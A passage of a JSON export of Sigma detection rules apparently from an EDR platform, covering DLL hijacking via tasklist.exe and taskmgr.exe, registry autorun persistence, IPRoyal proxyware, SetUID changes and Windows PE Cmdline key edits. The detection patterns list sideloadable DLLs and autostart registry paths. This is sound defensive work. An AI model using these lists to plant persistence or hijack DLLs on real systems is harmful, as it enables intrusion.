"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600143Z",
"creation_date": "2026-03-23T11:45:34.600147Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600154Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tasklist.yml",
"content": "title: DLL Hijacking via tasklist.exe\nid: d6c381a9-9a30-44bc-9ef4-59f6c33410b7\ndescription: |\n Detects potential Windows DLL Hijacking via tasklist.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tasklist.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\fastprox.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\wmiutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d6c381a9-9a30-44bc-9ef4-59f6c33410b7",
"rule_name": "DLL Hijacking via tasklist.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tasklist.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d6fc4ccc-d2d2-4d91-9b2f-320f5783914e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620504Z",
"creation_date": "2026-03-23T11:45:34.620506Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620511Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/rad9800/BootExecuteEDR",
"https://x.com/anylink20240604/status/1922360934418284677",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_uncommon_persistence_registry_asep.yml",
"content": "title: Uncommon Registry Autorun Key Added\nid: d6fc4ccc-d2d2-4d91-9b2f-320f5783914e\ndescription: |\n Detects when an uncommon entry is added/modified in one of the autostart extensibility point (ASEP) in the registry.\n Attackers may achieve persistence by referencing a program with a registry run key.\n It is recommended to investigate the process that added the key as well as the target of the registry key for malicious content.\nreferences:\n - https://github.com/rad9800/BootExecuteEDR\n - https://x.com/anylink20240604/status/1922360934418284677\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2025/05/19\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunServices\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecute'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecuteNoPnpSync'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\SetupExecute'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\PlatformExecute'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n # This is handled by the rule 907e5765-e7f7-4b8f-886c-749bf315fe52\n filter_remote:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_bootexecute:\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecute'\n Details:\n - 'autocheck autochk *'\n - 'autocheck autochk /q /v \\*'\n # autocheck autochk /r /c \\??\\C:\n - 'autocheck autochk /r /c \\\\\\?\\?\\\\?:'\n # autocheck autochk /p \\??\\C:;autocheck autochk *\n - 'autocheck autochk /p \\\\\\?\\?\\\\?:;autocheck autochk \\*'\n # autocheck autochk /r /c \\??\\C:;autocheck autochk *\n - 'autocheck autochk /r /c \\\\\\?\\?\\\\?:;autocheck autochk \\*'\n\n exclusion_policies:\n - TargetObject|contains:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n ProcessImage:\n - '?:\\Windows\\System32\\omadmclient.exe'\n - '?:\\Windows\\System32\\DeviceEnroller.exe'\n - TargetObject|contains:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n ProcessParentCommandLine: '?:\\Windows\\system32\\mmc.exe ?:\\Windows\\system32\\gpmc.msc'\n\n exclusion_program_files:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_ninjarmm:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe|'\n\n exclusion_citrix:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: 'autocheck autochk \\*;PvsVmBoot'\n\n exclusion_fsavailux:\n ProcessImage: '?:\\Windows\\System32\\fsavailux.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_chkdskex:\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe /Processid:{A4C31131-FF70-4984-AFD6-0609CED53AD6}'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_partitionwizard:\n ProcessImage|endswith: '\\PartitionWizard.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'MiniTool Solution Ltd'\n - 'MiniTool Software Limited'\n\n exclusion_partition_editor:\n ProcessDescription: 'NIUBI Partition Editor'\n ProcessCompany: 'NIUBI Technology'\n ProcessSigned: 'true'\n ProcessSignature: 'Chongqing NIUBI Technology Co., Ltd.'\n\n exclusion_icarus:\n ProcessImage|endswith: '\\icarus.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Avast Software s.r.o.'\n - 'AVG Technologies USA, LLC'\n - 'NortonLifeLock Inc.'\n\n exclusion_sysprep:\n ProcessImage: '?:\\Windows\\System32\\Sysprep\\sysprep.exe'\n Details: 'setupcl.exe'\n\n exclusion_poqexec:\n Details:\n - '?:\\Windows\\System32\\poqexec.exe /* \\SystemRoot\\WinSxS\\pending.xml'\n - '?:\\Windows\\System32\\poqexec.exe /* \\SystemRoot\\WinSxS\\reboot.xml'\n\n exclusion_ccmexec:\n - ProcessImage: '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d6fc4ccc-d2d2-4d91-9b2f-320f5783914e",
"rule_name": "Uncommon Registry Autorun Key Added",
"rule_description": "Detects when an uncommon entry is added/modified in one of the autostart extensibility point (ASEP) in the registry.\nAttackers may achieve persistence by referencing a program with a registry run key.\nIt is recommended to investigate the process that added the key as well as the target of the registry key for malicious content.\n",
"rule_creation_date": "2025-05-19",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d71d45eb-8dcf-40b0-a210-65568b8951db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613749Z",
"creation_date": "2026-03-23T11:45:34.613753Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613760Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_iproyal_pawns_usage.yml",
"content": "title: IPRoyal Pawn Executed\nid: d71d45eb-8dcf-40b0-a210-65568b8951db\ndescription: |\n Detects the usage of IPRoyal Pawn, a residential proxy service that allows users to sell their internet bandwidth in exchange for money.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate in your infrastructure.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.PUA.Iproyal\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains|all:\n - ' -accept-tos'\n - ' -email=* -password=* -device-name=*'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d71d45eb-8dcf-40b0-a210-65568b8951db",
"rule_name": "IPRoyal Pawn Executed",
"rule_description": "Detects the usage of IPRoyal Pawn, a residential proxy service that allows users to sell their internet bandwidth in exchange for money.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate in your infrastructure.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-02-05",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d727b5c5-7895-4a53-8cc9-7d2969985af0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618307Z",
"creation_date": "2026-03-23T11:45:34.618309Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618313Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md",
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_setuid_macos.yml",
"content": "title: SetUID Access Flag Set\nid: d727b5c5-7895-4a53-8cc9-7d2969985af0\ndescription: |\n Detects the SetUID bit being set on a file.\n This could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\n It is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2024/09/17\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.001\n - attack.defense_evasion\n - attack.t1222.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Kind:\n - chmod\n - chmod2\n PrettyMode: '??S??????'\n ProcessImage|contains: '?'\n\n exclusion_install:\n Image: '/private/tmp/PKInstallSandbox.??????/Scripts/*'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d727b5c5-7895-4a53-8cc9-7d2969985af0",
"rule_name": "SetUID Access Flag Set",
"rule_description": "Detects the SetUID bit being set on a file.\nThis could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\nIt is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\n",
"rule_creation_date": "2024-09-17",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d72d9c8c-0806-4dc7-878b-8b8304d2c8c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600771Z",
"creation_date": "2026-03-23T11:45:34.600775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600783Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_taskmgr.yml",
"content": "title: DLL Hijacking via taskmgr.exe\nid: d72d9c8c-0806-4dc7-878b-8b8304d2c8c4\ndescription: |\n Detects potential Windows DLL Hijacking via taskmgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'taskmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\d3d11.dll'\n - '\\d3d12.dll'\n - '\\duser.dll'\n - '\\dxcore.dll'\n - '\\dxgi.dll'\n - '\\pdh.dll'\n - '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d72d9c8c-0806-4dc7-878b-8b8304d2c8c4",
"rule_name": "DLL Hijacking via taskmgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via taskmgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d740ee29-1ab1-4218-97b9-68c90731d0fd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089061Z",
"creation_date": "2026-03-23T11:45:34.089063Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089068Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://oofhours.com/2020/12/03/windows-pe-startup-revisited/",
"https://slightlyovercomplicated.com/2016/11/07/windows-pe-startup-sequence-explained/",
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1547_setup_cmdline_key_set.yml",
"content": "title: Cmdline Registry Key Related to Windows PE Startup Modified\nid: d740ee29-1ab1-4218-97b9-68c90731d0fd\ndescription: |\n Detects a modification of the registry key related to Windows PE startup.\n Adversaries may modify the Cmdline registry key to execute malicious code early in the Windows boot sequence as a persistence mechanism or to gain privileged access.\n It is recommended to check the process making the modification for other suspicious purpose and for suspicious children process of Winlogon.exe if the machine was rebooted.\nreferences:\n - https://oofhours.com/2020/12/03/windows-pe-startup-revisited/\n - https://slightlyovercomplicated.com/2016/11/07/windows-pe-startup-sequence-explained/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2024/07/23\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\system\\setup\\cmdline'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_osdsetuphook:\n ProcessImage: '?:\\Windows\\System32\\OSDSETUPHOOK.EXE'\n Details: 'system32\\osdsetuphook.exe /execute'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n Details: 'OOBE\\SetupPlatform\\SetupPlatform.exe /rollbackonlinesystem'\n\n exclusion_windeploy:\n # ProcessImage:\n # - '?:\\Windows\\System32\\oobe\\windeploy.exe'\n # - '?:\\Windows\\System32\\Sysprep\\sysprep.exe'\n # - '?:\\Windows\\System32\\CloudExperienceHostBroker.exe'\n Details:\n - 'oobe\\windeploy.exe'\n - '?:\\Windows\\system32\\oobe\\windeploy.exe'\n\n exclusion_smstspostupgrade:\n ProcessGrandparentImage:\n - '?:\\Windows\\System32\\oobe\\windeploy.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\cmd.exe'\n ProcessImage: '?:\\Windows\\System32\\reg.exe'\n Details:\n - '?:\\WINDOWS\\SMSTSPostUpgrade\\setupcomplete.cmd'\n - '?:\\Windows\\SMSTSPostUpgrade\\setuprollback.cmd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d740ee29-1ab1-4218-97b9-68c90731d0fd",
"rule_name": "Cmdline Registry Key Related to Windows PE Startup Modified",
"rule_description": "Detects a modification of the registry key related to Windows PE startup.\nAdversaries may modify the Cmdline registry key to execute malicious code early in the Windows boot sequence as a persistence mechanism or to gain privileged access.\nIt is recommended to check the process making the modification for other suspicious purpose and for suspicious children process of Winlogon.exe if the machine was rebooted.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7778b81-d88b-4182-8bf9-14ade4b1124c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622649Z",
"creation_date": "2026-03-23T11:45:34.622651Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622656Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_defender_disable_registry.yml",
